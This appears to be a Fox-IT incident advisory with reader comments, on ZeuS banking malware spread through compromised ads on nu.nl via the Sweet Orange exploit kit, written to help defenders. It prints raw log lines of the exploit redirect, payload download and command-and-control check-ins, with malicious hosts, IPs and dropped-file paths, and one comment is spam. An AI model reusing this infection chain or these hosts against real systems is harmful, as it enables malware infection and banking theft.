Fox-IT houdt voor haar klanten de netwerkbeveiliging in de gaten. Hierbij zijn op 5 juni tussen 10:42 en 15:34 besmettingen geconstateerd van klanten die nu.nl bezochten. Er zijn waarschijnlijk meer Nederlanders besmet na een bezoek aan nu.nl.
De infectie werd verspreid via advertenties. De oorzaak is een advertentieserver die op nu.nl adverteerde. De software om advertenties te tonen was waarschijnlijk gecompromitteerd.
Geïnfecteerde bezoekers zijn besmet met een vernieuwde versie van de banking malware ZeuS. De malware wordt nog door slechts 2 van de 47 virusscanners opgemerkt.
Wat kunt u doen?
Indien u op 5 juni nu.nl heeft bezocht is het raadzaam uw computer te controleren op de malware. De malware laat bestanden achter in de “Application Data” folder die worden opgestart bij het aanzetten van de computer. Controleer of er onbekende programma’s worden opgestart.
Indien u beschikt over proxy logs controleer dan of uw gebruikers naar 195.3.147.191 zijn geweest, dit is het IP-adres vanaf waar de malware is verspreid.
Besmette computers verbinden op 67.211.197.91 en 91.223.88.144 om commando’s op te halen.
Yonathan Klijnsma and Lennart Haagsma
Gedetailleerde analyse van het Fox-IT Security Operations Center:
Nu.nl article loaded advertisement from a provider with a compromised OpenX install, one particular example:
hxxp://www.nu.nl/binnenland/3492596/lam-met-twee-gezichten-overleden.html
The advertisement was loaded from:
hxxp://<removed> .com/www/delivery/afr.php?zoneid=17
This then served a redirect to an exploit kit called “Sweet Orange Exploit Kit”
"GET hxxp://extraprimarilyfurious .biz/sites/directadmin/demos/skins.php?mediakit=22 HTTP/1.1" - - "hxxp://<removed> .com/www/delivery/afr.php?zoneid=17"
As seen from the referrer the advertisement provider redirects to the exploit kit located at extraprimarilyfurious .biz
This then GETs from its own page to get payload information using a java exploit from the main landing page:
"GET hxxp://extraprimarilyfurious .biz/sites/directadmin/demos/yclZU HTTP/1.1" - - "-" "Mozilla/4.0 (Windows XP 5.1) Java/1.5.0_18"
After a successful java exploit the binary is obtained:
"GET hxxp://syncplicitysoap .biz/texis.php?html=296&down=123&honda=4&humor=683&fedora=171&lang=448&wifi=712&flex=748&class=410&guestbook=335053624 HTTP/1.1"
The binary is crypted when downloaded and is decrypted by the java code, in this case it is a loader which talks to a Russian domain to get the ZeuS malware binary.
When Zeus starts it connects to the CnC serving the configuration:
"POST hxxp://puuji.travestieurope .org/amob/ad03928/cfg/config.php HTTP/1.1"
After retrieving its config the malware starts doing periodical checkins to its main CnC to retrieve commands:
"POST hxxp://elbaroni .com/amob/ad03928/global.php HTTP/1.1"
These files are left on the sytem:
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp<random1>.bat C:\Documents and Settings\Administrator\Application Data\<random2>\<random3>.cax C:\Documents and Settings\Administrator\Application Data\<random4>\<random5>.exe
These programs are started at boot:
C:\Documents and Settings\Administrator\Application Data\<random4>\<random5>.exe C:\WINDOWS\system32\cmd.exe /c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmp<random1>.bat"
hello there and thank you for your information – I
have certainly picked up anything new from right here.
I did however expertise a few technical points using
this site, since I experienced to reload the web site a lot of times previous to
I could get it to load correctly. I had been wondering if your hosting is OK?
Not that I am complaining, but slow loading instances times will
very frequently affect your placement in google and could damage your quality score
if ads and marketing with Adwords. Well I’m adding
this RSS to my e-mail and could look out for much more
of your respective interesting content. Ensure that you
update this again very soon.
Think i found it by myself MD5 “1c89dac19af7cde5ee9b5acf893b9cbc”
I would like to get a hold of the binary downloaded, for signature creation.
Misschien een domme vraag maar geldt dit ook voor Macs?
En hoe heten die besmette bestanden?
Ad-block opzich is geen garantie dat je de ad niet hebt opgehaald. Dat ligt helemaal aan de methodiek van blocken.
Ofwel wordt de advertentie op technisch niveau tegengehouden of zorgt de app er alleenmaar voor cosmetische aanpassingen terwijl de advertentie wel word opgehaald. In dat laatste geval is infectie nog altijd mogelijk.
Het beste kan je je pc controleren op bovengenoemde punten en eventueel scannen met een genoemde scanners.
In het kader van don’t run what you don’t serve kan je ook controleren of onnodige zaken als Java standaard uitstaan in je Browser. Java is voor de meeste websites achterhaald en het is eigenlijk enkel een beveiligingsrisico als je het niet nodig hebt.
Als ik AdBlock Plus gebruik, is de geinfecteerde ad dan nooit geopend geweest voor mij?
Is er inmiddels al meer bekend over het besmettingsvlak en of Virusscanners imiddels geupdated worden om het weg te halen? Specifieke java verzies zouden inderdaad ook wel mooi zijn om te weten. Is het alleen 1.5.0_18?
Fox-it Vertel dan welke versies van Java kwetsbaar zijn of in ieder geval met welke update/versie je niet kwetsbaar ben dit laatste hoeft toch bijna geen tijd te kosten.
All clear about the java retrieving encrypted binary code etc, but how can Windows ever allow the following steps:
– run the binary code from within webbrowser embedded jave
– access user folders (Application Data folder; Local Settings folder) to store the files (.bat / .exe)
– add itself to the startup sequence.
All of those steps should not be possible from within (embedded) java code, right?